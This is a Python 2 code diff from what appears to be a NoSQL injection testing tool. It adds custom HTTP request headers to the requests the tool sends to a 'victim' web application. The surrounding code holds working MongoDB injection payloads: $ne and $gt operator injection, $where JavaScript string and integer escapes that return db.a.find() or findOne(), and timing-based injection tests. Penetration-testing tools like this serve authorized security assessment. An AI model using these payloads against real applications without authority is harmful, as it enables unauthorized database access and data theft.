@@ -166,6 +166,7 @@ def options():
166166 global verb
167167 global mmSelect
168168 global dbPort
169+ global requestHeaders
169170
170171 #Set default value if needed
171172 if optionSet [0 ] == False :
@@ -299,6 +300,12 @@ def options():
299300 else :
300301 print "Invalid selection"
301302
303+ reqHeadersIn = raw_input ("Enter HTTP Request Header data in a comma separated list (i.e. header name 1,value1,header name 2,value2)\n " )
304+ reqHeadersArray = reqHeadersIn .split ("," )
305+ headerNames = reqHeadersArray [0 ::2 ]
306+ headerValues = reqHeadersArray [1 ::2 ]
307+ requestHeaders = dict (zip (headerNames , headerValues ))
308+
302309 elif select == "7" :
303310 #Unset the setting boolean since we're setting it again.
304311 optionSet [4 ] = False
@@ -447,6 +454,7 @@ def postApps():
447454 global postData
448455 global neDict
449456 global gtDict
457+ global requestHeaders
450458 testNum = 1
451459
452460 #Verify app is working.
@@ -460,7 +468,7 @@ def postApps():
460468
461469 try :
462470 body = urllib .urlencode (postData )
463- req = urllib2 .Request (appURL ,body )
471+ req = urllib2 .Request (appURL ,body , requestHeaders )
464472 appRespCode = urllib2 .urlopen (req ).getcode ()
465473
466474 if appRespCode == 200 :
@@ -515,7 +523,7 @@ def postApps():
515523 print "Sending random parameter value..."
516524
517525 body = urllib .urlencode (postData )
518- req = urllib2 .Request (appURL ,body )
526+ req = urllib2 .Request (appURL ,body , requestHeaders )
519527 randLength = int (len (urllib2 .urlopen (req ).read ()))
520528 print "Got response length of " + str (randLength ) + "."
521529
@@ -531,7 +539,7 @@ def postApps():
531539 neDict [injOpt + "[$ne]" ] = neDict [injOpt ]
532540 del neDict [injOpt ]
533541 body = urllib .urlencode (neDict )
534- req = urllib2 .Request (appURL ,body )
542+ req = urllib2 .Request (appURL ,body , requestHeaders )
535543 if verb == "ON" :
536544 print "Testing Mongo PHP not equals associative array injection using " + str (postData ) + "..."
537545
@@ -558,7 +566,7 @@ def postApps():
558566 gtDict [injOpt + "[$gt]" ] = gtDict [injOpt ]
559567 del gtDict [injOpt ]
560568 body = urllib .urlencode (gtDict )
561- req = urllib2 .Request (appURL ,body )
569+ req = urllib2 .Request (appURL ,body , requestHeaders )
562570 if verb == "ON" :
563571 print "Testing PHP/ExpressJS >Undefined Injection using " + str (postData ) + "..."
564572
@@ -574,7 +582,7 @@ def postApps():
574582
575583 postData .update ({injOpt :"a'; return db.a.find(); var dummy='!" })
576584 body = urllib .urlencode (postData )
577- req = urllib2 .Request (appURL ,body )
585+ req = urllib2 .Request (appURL ,body , requestHeaders )
578586 if verb == "ON" :
579587 print "Testing Mongo <2.4 $where all Javascript string escape attack for all records...\n "
580588 print "Injecting " + str (postData )
@@ -595,7 +603,7 @@ def postApps():
595603
596604 postData .update ({injOpt :"1; return db.a.find(); var dummy=1" })
597605 body = urllib .urlencode (postData )
598- req = urllib2 .Request (appURL ,body )
606+ req = urllib2 .Request (appURL ,body , requestHeaders )
599607 if verb == "ON" :
600608 print "Testing Mongo <2.4 $where Javascript integer escape attack for all records...\n "
601609 print "Injecting " + str (postData )
@@ -615,7 +623,7 @@ def postApps():
615623 #Start a single record attack in case the app expects only one record back
616624 postData .update ({injOpt :"a'; return db.a.findOne(); var dummy='!" })
617625 body = urllib .urlencode (postData )
618- req = urllib2 .Request (appURL ,body )
626+ req = urllib2 .Request (appURL ,body , requestHeaders )
619627 if verb == "ON" :
620628 print "Testing Mongo <2.4 $where all Javascript string escape attack for one record...\n "
621629 print " Injecting " + str (postData )
@@ -636,7 +644,7 @@ def postApps():
636644
637645 postData .update ({injOpt :"1; return db.a.findOne(); var dummy=1" })
638646 body = urllib .urlencode (postData )
639- req = urllib2 .Request (appURL ,body )
647+ req = urllib2 .Request (appURL ,body , requestHeaders )
640648 if verb == "ON" :
641649 print "Testing Mongo <2.4 $where Javascript integer escape attack for one record...\n "
642650 print " Injecting " + str (postData )
@@ -657,7 +665,7 @@ def postApps():
657665
658666 postData .update ({injOpt :"a'; return this.a != '" + injectString + "'; var dummy='!" })
659667 body = urllib .urlencode (postData )
660- req = urllib2 .Request (appURL ,body )
668+ req = urllib2 .Request (appURL ,body , requestHeaders )
661669
662670 if verb == "ON" :
663671 print "Testing Mongo this not equals string escape attack for all records..."
@@ -678,7 +686,7 @@ def postApps():
678686
679687 postData .update ({injOpt :"1; return this.a != '" + injectString + "'; var dummy=1" })
680688 body = urllib .urlencode (postData )
681- req = urllib2 .Request (appURL ,body )
689+ req = urllib2 .Request (appURL ,body , requestHeaders )
682690
683691 if verb == "ON" :
684692 print "Testing Mongo this not equals integer escape attack for all records..."
@@ -812,6 +820,7 @@ def getApps():
812820 str24 = False
813821 global int24
814822 int24 = False
823+ global requestHeaders
815824
816825 #Verify app is working.
817826 print "Checking to see if site at " + str (victim ) + ":" + str (webPort ) + str (uri ) + " is up..."
@@ -822,10 +831,11 @@ def getApps():
822831 elif https == "ON" :
823832 appURL = "https://" + str (victim ) + ":" + str (webPort ) + str (uri )
824833 try :
825- appRespCode = urllib .urlopen (appURL ).getcode ()
834+ req = urllib2 .Request (appURL , None , requestHeaders )
835+ appRespCode = urllib2 .urlopen (req ).getcode ()
826836 if appRespCode == 200 :
827- normLength = int (len (urllib .urlopen (appURL ).read ()))
828- timeReq = urllib .urlopen (appURL )
837+ normLength = int (len (urllib2 .urlopen (req ).read ()))
838+ timeReq = urllib2 .urlopen (req )
829839 start = time .time ()
830840 page = timeReq .read ()
831841 end = time .time ()
@@ -853,13 +863,15 @@ def getApps():
853863 #Build a random string and insert; if the app handles input correctly, a random string and injected code should be treated the same.
854864 #Add error handling for Non-200 HTTP response codes if random strings freaks out the app.
855865 randomUri = buildUri (appURL ,injectString )
866+ print "URI : " + randomUri
867+ req = urllib2 .Request (randomUri , None , requestHeaders )
856868
857869 if verb == "ON" :
858870 print "Checking random injected parameter HTTP response size using " + randomUri + "...\n "
859871 else :
860872 print "Sending random parameter value..."
861873
862- randLength = int (len (urllib .urlopen (randomUri ).read ()))
874+ randLength = int (len (urllib2 .urlopen (req ).read ()))
863875 print "Got response length of " + str (randLength ) + "."
864876 randNormDelta = abs (normLength - randLength )
865877
@@ -874,10 +886,11 @@ def getApps():
874886 print "Test 1: PHP/ExpressJS != associative array injection"
875887
876888 #Test for errors returned by injection
877- errorCheck = errorTest (str (urllib .urlopen (uriArray [1 ]).read ()),testNum )
889+ req = urllib2 .Request (uriArray [1 ], None , requestHeaders )
890+ errorCheck = errorTest (str (urllib2 .urlopen (req ).read ()),testNum )
878891
879892 if errorCheck == False :
880- injLen = int (len (urllib .urlopen (uriArray [ 1 ] ).read ()))
893+ injLen = int (len (urllib2 .urlopen (req ).read ()))
881894 checkResult (randLength ,injLen ,testNum )
882895 testNum += 1
883896 else :
@@ -890,12 +903,12 @@ def getApps():
890903 else :
891904 print "Test 2: $where injection (string escape)"
892905
893-
894- errorCheck = errorTest (str (urllib .urlopen (uriArray [ 2 ] ).read ()),testNum )
906+ req = urllib2 . Request ( uriArray [ 2 ], None , requestHeaders )
907+ errorCheck = errorTest (str (urllib2 .urlopen (req ).read ()),testNum )
895908
896909
897910 if errorCheck == False :
898- injLen = int (len (urllib .urlopen (uriArray [ 2 ] ).read ()))
911+ injLen = int (len (urllib2 .urlopen (req ).read ()))
899912 checkResult (randLength ,injLen ,testNum )
900913 testNum += 1
901914
@@ -909,11 +922,12 @@ def getApps():
909922 else :
910923 print "Test 3: $where injection (integer escape)"
911924
912- errorCheck = errorTest (str (urllib .urlopen (uriArray [3 ]).read ()),testNum )
925+ req = urllib2 .Request (uriArray [3 ], None , requestHeaders )
926+ errorCheck = errorTest (str (urllib2 .urlopen (req ).read ()),testNum )
913927
914928
915929 if errorCheck == False :
916- injLen = int (len (urllib .urlopen (uriArray [ 3 ] ).read ()))
930+ injLen = int (len (urllib2 .urlopen (req ).read ()))
917931 checkResult (randLength ,injLen ,testNum )
918932 testNum += 1
919933
@@ -928,11 +942,11 @@ def getApps():
928942 else :
929943 print "Test 4: $where injection string escape (single record)"
930944
931-
932- errorCheck = errorTest (str (urllib .urlopen (uriArray [ 4 ] ).read ()),testNum )
945+ req = urllib2 . Request ( uriArray [ 4 ], None , requestHeaders )
946+ errorCheck = errorTest (str (urllib2 .urlopen (req ).read ()),testNum )
933947
934948 if errorCheck == False :
935- injLen = int (len (urllib .urlopen (uriArray [ 4 ] ).read ()))
949+ injLen = int (len (urllib2 .urlopen (req ).read ()))
936950 checkResult (randLength ,injLen ,testNum )
937951 testNum += 1
938952 else :
@@ -945,10 +959,11 @@ def getApps():
945959 else :
946960 print "Test 5: $where injection integer escape (single record)"
947961
948- errorCheck = errorTest (str (urllib .urlopen (uriArray [5 ]).read ()),testNum )
962+ req = urllib2 .Request (uriArray [5 ], None , requestHeaders )
963+ errorCheck = errorTest (str (urllib2 .urlopen (req ).read ()),testNum )
949964
950965 if errorCheck == False :
951- injLen = int (len (urllib .urlopen (uriArray [ 5 ] ).read ()))
966+ injLen = int (len (urllib2 .urlopen (req ).read ()))
952967 checkResult (randLength ,injLen ,testNum )
953968 testNum += 1
954969
@@ -962,10 +977,11 @@ def getApps():
962977 else :
963978 print "Test 6: This != injection (string escape)"
964979
965- errorCheck = errorTest (str (urllib .urlopen (uriArray [6 ]).read ()),testNum )
980+ req = urllib2 .Request (uriArray [6 ], None , requestHeaders )
981+ errorCheck = errorTest (str (urllib2 .urlopen (req ).read ()),testNum )
966982
967983 if errorCheck == False :
968- injLen = int (len (urllib .urlopen (uriArray [ 6 ] ).read ()))
984+ injLen = int (len (urllib2 .urlopen (req ).read ()))
969985 checkResult (randLength ,injLen ,testNum )
970986 testNum += 1
971987 else :
@@ -978,10 +994,11 @@ def getApps():
978994 else :
979995 print "Test 7: This != injection (integer escape)"
980996
981- errorCheck = errorTest (str (urllib .urlopen (uriArray [7 ]).read ()),testNum )
997+ req = urllib2 .Request (uriArray [7 ], None , requestHeaders )
998+ errorCheck = errorTest (str (urllib2 .urlopen (req ).read ()),testNum )
982999
9831000 if errorCheck == False :
984- injLen = int (len (urllib .urlopen (uriArray [ 7 ] ).read ()))
1001+ injLen = int (len (urllib2 .urlopen (req ).read ()))
9851002 checkResult (randLength ,injLen ,testNum )
9861003 testNum += 1
9871004 else :
@@ -995,19 +1012,21 @@ def getApps():
9951012 else :
9961013 print "Test 8: PHP/ExpressJS > Undefined Injection"
9971014
998- errorCheck = errorTest (str (urllib .urlopen (uriArray [8 ]).read ()),testNum )
1015+ req = urllib2 .Request (uriArray [8 ], None , requestHeaders )
1016+ errorCheck = errorTest (str (urllib2 .urlopen (req ).read ()),testNum )
9991017
10001018 if errorCheck == False :
1001- injLen = int (len (urllib .urlopen (uriArray [ 8 ] ).read ()))
1019+ injLen = int (len (urllib2 .urlopen (req ).read ()))
10021020 checkResult (randLength ,injLen ,testNum )
10031021 testNum += 1
10041022
10051023 doTimeAttack = raw_input ("Start timing based tests (y/n)? " )
10061024
10071025 if doTimeAttack in yes_tag :
10081026 print "Starting Javascript string escape time based injection..."
1027+ req = urllib2 .Request (uriArray [18 ], None , requestHeaders )
10091028 start = time .time ()
1010- strTimeInj = urllib .urlopen (uriArray [ 18 ] )
1029+ strTimeInj = urllib2 .urlopen (req )
10111030 page = strTimeInj .read ()
10121031 end = time .time ()
10131032 strTimeInj .close ()
@@ -1024,8 +1043,9 @@ def getApps():
10241043 strTbAttack = False
10251044
10261045 print "Starting Javascript integer escape time based injection..."
1046+ req = urllib2 .Request (uriArray [9 ], None , requestHeaders )
10271047 start = time .time ()
1028- intTimeInj = urllib .urlopen (uriArray [ 9 ] )
1048+ intTimeInj = urllib2 .urlopen (req )
10291049 page = intTimeInj .read ()
10301050 end = time .time ()
10311051 intTimeInj .close ()
0 commit comments